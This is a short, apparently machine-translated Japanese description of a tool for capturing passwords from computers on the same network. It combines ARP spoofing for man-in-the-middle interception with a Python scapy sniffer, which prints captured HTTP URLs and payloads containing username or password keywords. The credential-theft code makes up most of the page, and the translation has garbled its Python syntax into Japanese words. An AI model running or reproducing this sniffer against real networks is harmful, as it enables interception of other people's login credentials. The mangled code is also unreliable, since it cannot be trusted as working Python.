同じネットワークに接続された任意のコンピュータからパスワードをキャプチャします。
ARP_SPOOF + PACKET_SNIFFER
- 同じネットワーク上のコンピュータを対象とします。
- パケットのフローをリダイレクトするarp_spoof(なりMITM)
- 参照するにはPacket_sniffer のURL、ユーザ名、およびパスワードターゲットによって送信されます。
#!は/ usr / binに/ envをパイソン から scapy.allのインポート * から scapy.layers.httpのインポート *のデフスニフ(インターフェース): scapy.all.sniff(ifaceの =インターフェース、店舗= Falseを、PRN = process_sniffed_packet)デフGET_URL(パケット): リターンパケット[HTTPRequestの】.Host.decode(エラーが= ' 無視')+パケット[HTTPRequestの】.Path.decode(エラー= ' 無視' )DEF get_login_info(パケット): もしpacket.haslayer(scapy.all。生): 負荷 =パケット[scapy.all.Raw] .load.decode(エラー= 「無視」) のキーワードを [= 「ユーザ名」、「ユーザー」、「ログイン」、「パスワード」、「パス」] のためのキーワードでキーワード: 場合は、キーワードでの負荷: リターン・ロード・ デフprocess_sniffed_packet(パケット): もしpacket.haslayer( HTTPRequestの): URL = GET_URL(パケット)を 印刷(" [+] HTTPリクエスト>> " + URL) login_info = get_login_info(パケット) の場合login_info: 印刷(" \ N \ N [+]可能性のあるユーザー名/パスワード> " + login_info + " \ N \ N " ) スニフ(" eth0の")